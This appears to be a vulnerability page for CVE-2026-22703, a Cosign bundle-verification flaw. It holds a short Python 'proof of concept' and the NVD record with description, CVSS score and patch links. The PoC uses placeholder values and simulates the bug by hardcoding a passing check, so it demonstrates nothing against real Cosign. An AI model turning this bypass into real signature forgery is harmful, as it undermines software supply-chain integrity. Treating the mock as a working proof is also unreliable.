CVE-2026-22703

# CVE-2026-22703 PoC - Crafted Cosign Bundle Bypass # This PoC demonstrates how a malicious bundle can be constructed # Note: Requires compromised signing key or identity import json import base64 def create_malicious_bundle(): """ Create a malicious Cosign bundle that bypasses verification """ # Valid Rekor entry that does NOT reference the target artifact malicious_rekor_entry = { 'body': base64.b64encode(json.dumps({ 'Body': { 'HashRekor': { 'hash': '0xdeadbeef1234567890abcdef1234567890abcdef1234567890abcdef12345678' } }, 'Signature': 'malicious_rekor_signature', 'PublicKey': 'attacker_public_key' }).encode()).decode(), 'integratedTime': 1704900000, 'logIndex': 12345, 'uuid': 'malicious-uuid-12345' } # Bundle structure that Cosign will accept malicious_bundle = { 'signatures': [{ 'sig': base64.b64encode(b'attacker_signature').decode(), 'cert': 'attacker_fulcio_cert' }], 'verificationPayload': { 'rekorBundle': { 'SignedEntryTimestamp': base64.b64encode( json.dumps(malicious_rekor_entry).encode() ).decode(), 'payloadHash': { 'hash': '0xattacker_controlled_hash' }, 'publicKey': 'attacker_public_key' } } } return malicious_bundle def verify_bundle_bypass(bundle, target_artifact_digest): """ Demonstrates the vulnerable verification logic Cosign only checks Rekor signature, not content correlation """ # Vulnerable code: Only verifies Rekor entry signature rekor_signature_valid = True # Assume valid # Missing checks that should be present: # 1. artifact_digest == rekor_entry.body.hash # 2. public_key == rekor_entry.body.publicKey # 3. signature == rekor_entry.body.signature if rekor_signature_valid: # BUG: Returns True even without content verification return True return False if __name__ == '__main__': bundle = create_malicious_bundle() result = verify_bundle_bypass(bundle, 'target_digest') print(f'Bundle verification result: {result}') print('PoC demonstrates bypass: Verification passes despite mismatched content')

{"cve": {"id": "CVE-2026-22703", "sourceIdentifier": "[email protected]", "published": "2026-01-10T07:16:03.030", "lastModified": "2026-02-05T20:59:07.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cosign provides code signing and transparency for containers and binaries. Prior to versions 2.6.2 and 3.0.4, Cosign bundle can be crafted to successfully verify an artifact even if the embedded Rekor entry does not reference the artifact's digest, signature or public key. When verifying a Rekor entry, Cosign verifies the Rekor entry signature, and also compares the artifact's digest, the user's public key from either a Fulcio certificate or provided by the user, and the artifact signature to the Rekor entry contents. Without these comparisons, Cosign would accept any response from Rekor as valid. A malicious actor that has compromised a user's identity or signing key could construct a valid Cosign bundle by including any arbitrary Rekor entry, thus preventing the user from being able to audit the signing event. This issue has been patched in versions 2.6.2 and 3.0.4."}, {"lang": "es", "value": "Cosign proporciona firma de código y transparencia para contenedores y binarios. Antes de las versiones 2.6.2 y 3.0.4, un paquete de Cosign podía ser manipulado para verificar con éxito un artefacto incluso si la entrada de Rekor incrustada no hacía referencia al *digest* del artefacto, a la firma o a la clave pública. Al verificar una entrada de Rekor, Cosign verifica la firma de la entrada de Rekor y también compara el *digest* del artefacto, la clave pública del usuario (ya sea de un certificado de Fulcio o proporcionada por el usuario) y la firma del artefacto con el contenido de la entrada de Rekor. Sin estas comparaciones, Cosign aceptaría cualquier respuesta de Rekor como válida. Un actor malicioso que haya comprometido la identidad o la clave de firma de un usuario podría construir un paquete de Cosign válido incluyendo cualquier entrada de Rekor arbitraria, impidiendo así al usuario auditar el evento de firma. Este problema ha sido parcheado en las versiones 2.6.2 y 3.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-345"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sigstore:cosign:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.6.2", "matchCriteriaId": "7ABA7B55-66EA-4E85-9F5E-1C392C4FCB6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sigstore:cosign:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.4", "matchCriteriaId": "35768783-8EF1-41DB-8DD1-6870B46B647C"}]}]}], "references": [{"url": "https://github.com/sigstore/cosign/commit/6832fba4928c1ad69400235bbc41212de5006176", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sigstore/cosign/pull/4623", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/sigstore/cosign/security/advisories/GHSA-whqx-f9j3-ch6m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}